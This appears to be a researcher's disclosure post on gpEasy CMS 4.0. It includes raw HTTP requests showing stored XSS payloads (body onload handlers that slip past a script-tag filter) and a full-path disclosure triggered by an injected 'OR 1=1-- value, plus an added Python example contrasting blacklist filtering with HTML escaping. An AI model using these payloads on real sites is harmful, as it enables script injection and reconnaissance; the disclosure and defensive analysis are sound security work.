Hi,
there is a new release of gpEasy CMS. This release has number 4.0.
I decided to post it here too.
Of course, all vulnerable parts of this CMS are located in the section dedicated to the logged-in admin,
so maybe you should consider them low-severity vulnerabilities (... csrf? ;) ).
Anyway, maybe a few of you will find it interesting.
I should mention here that the gpEasy Team is developing better and better filters,
so we will see what they'll do in the next version.
Here we go:
The first one, detailed below, is an XSS vulnerability.
A simple <script> tag is filtered out. Anyway, the filter can be bypassed like this:
---request---
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache
cmd=new_section&file=aaaaaaaaaaaa&type=<h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbbbbbb</h1>&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area
---request---
and we will see in the response source code that our payload was added unchanged:
---response---
(...)
>Delete</a></td></tr><tr class=\"even\"><td style=\"white-space:nowrap\">aaaaaaaaaa
aa</td><td><h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbb
bbbb</h1></td><td>\"<span class=\"admin_note\">New Section</span>...\"</td>
<td style=\"white-space:nowrap\"><a href=\"/kuba/gpEasy4.0/
(...)
---response---
A similar situation in another place:
---request---
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache
cmd=new_section&file=aaaaaaaaaaaa&type='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area
---request---
The response will be similar.
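Both requests above show the same root cause: a filter that removes <script> tags but leaves other tags and their event handlers intact. The following added example (not gpEasy's code; the blacklist filter is a constructed stand-in for the behaviour the post describes) contrasts that approach with plain HTML entity encoding, using the two "type" values from the requests as test inputs, and includes a small checker that reports any on* handler that survives inside a real tag.

```python
import html
import re

# Constructed inputs, copied from the "type" parameter of the two requests above
PAYLOAD_1 = '<h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbbbbbb</h1>'
PAYLOAD_2 = '\'>"><body onload=alert(/4321/)>'

SCRIPT_TAG = re.compile(r'</?script[^>]*>', re.IGNORECASE)
# A real opening tag: "<" followed by a tag name, then its attribute string
TAG = re.compile(r'<([a-z][a-z0-9]*)\b([^>]*)>', re.IGNORECASE)


def blacklist_filter(value: str) -> str:
    """Assumed stand-in for a filter that only strips <script> tags.

    This is the weak approach: every other tag and attribute passes through.
    """
    return SCRIPT_TAG.sub('', value)


def escape_for_html(value: str) -> str:
    """Encode the value as text so the browser never sees a tag boundary.

    quote=True also encodes ' and ", which matters if the value is ever
    echoed inside an attribute rather than in element content.
    """
    return html.escape(value, quote=True)


def live_event_handlers(rendered: str) -> list[str]:
    """Return the on* attribute names found inside real (unescaped) tags.

    Escaped output contains no '<' at all, so it yields an empty list.
    """
    found = []
    for tag in TAG.finditer(rendered):
        for attr in re.findall(r'\b(on[a-z]+)\s*=', tag.group(2), re.IGNORECASE):
            found.append(attr.lower())
    return found


def render_cell(section_type: str, sanitizer) -> str:
    """Mimic the table cell into which the admin page echoes the "type" value."""
    return '<td>' + sanitizer(section_type) + '</td>'


if __name__ == '__main__':
    for payload in (PAYLOAD_1, PAYLOAD_2):
        print('blacklist :', live_event_handlers(blacklist_filter(payload)))
        print('escaped   :', live_event_handlers(escape_for_html(payload)))
        print(render_cell(payload, escape_for_html))
```

The checker is deliberately simple (it knows nothing about HTML parsing quirks), but it is enough to make the point: the blacklist version of both payloads still carries a live onload handler, while the entity-encoded version carries none, because the value can no longer open a tag in the first place.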
Another, smaller issue is described below.
During some tests I found that gpEasy reveals the full filesystem path to the webroot.
Check it out:
---request---
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache
title=My+gpEasy+CMS&keywords=gpEasy+CMS%2C+Easy+CMS%2C+Content+Management%2C+PHP%2C+Free+CMS%2C+Website+builder%2C+Open+Source&desc=A+new+gpEasy+CMS+installation.+You+can+change+your+site's+description+in+the+configuration.&colorbox_style=example1&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true&showgplink=false&showgplink=true&jquery=local&maximgarea=691200&maxthumbsize=100&auto_redir=90&HTML_Tidy='%2bOR%2b1%3d1--&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=true&resize_images=false&resize_images=true&toemail=admin%40here.com&toname=&from_address=AutomatedSender%40192.168.1.101&from_name=Automated+Sender&from_use_user=false&require_email=&mail_method=mail&sendmail_path=&smtp_hosts=&smtp_user=&smtp_pass=&recaptcha_public=&recaptcha_private=&recaptcha_language=inherit&cmd=save_config&verified=95027f35b0&verified=95027f35b0&aaa=Save
---request---
The response for this one looks like this:
---response---
HTTP/1.0 500 Internal Server Error
Date: Fri, 24 May 2013 18:07:02 GMT
(...)
Content-Type: text/html; charset=utf-8
<p>Oops, an error occurred while generating this page.<p><h3>Error Details</h3><pre>array(
[type] => (integer)4
[message] => (string)syntax error, unexpected ''in' (T_ENCAPSED_AND_WHITESPACE)
[file] => (string)/home/kuba/public_html/gpEasy4.0/gpEasy/data/_site/config.php
[line] => (integer)92
[request] => (string)/kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905
[time] => (integer)1369418822
[request_method] => (string)POST
[file_modified] => (integer)1369418822
[file_size] => (integer)3082
)</pre><p><a href="">Reload this page</a></p><p style="font-size:90%">Note: Error details are only displayed for logged in administrators</p>
---response---
The HTML_Tidy parameter is vulnerable, but if you want, you should test it again yourself,
because I think it could be a bug similar to the one I found in Drupal:
if you send 'too many requests' to the webapp, it will simply crash (and the error will be presented).
Thanks to gpEasy Team for a fast reply. Good job!
Cheers o/